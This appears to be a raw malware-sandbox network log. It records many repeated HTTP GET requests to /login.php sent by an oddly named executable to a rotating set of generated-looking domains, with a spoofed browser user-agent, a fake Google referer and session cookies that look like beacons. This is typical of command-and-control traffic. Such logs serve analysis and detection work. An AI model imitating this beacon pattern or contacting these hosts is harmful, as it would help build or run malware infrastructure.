Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347462|1731347428|17|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347463|1731347428|17|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347465|1731347428|10|3|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347473|1731347428|13|3|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347473|1731347428|9|4|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347473|1731347428|13|3|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
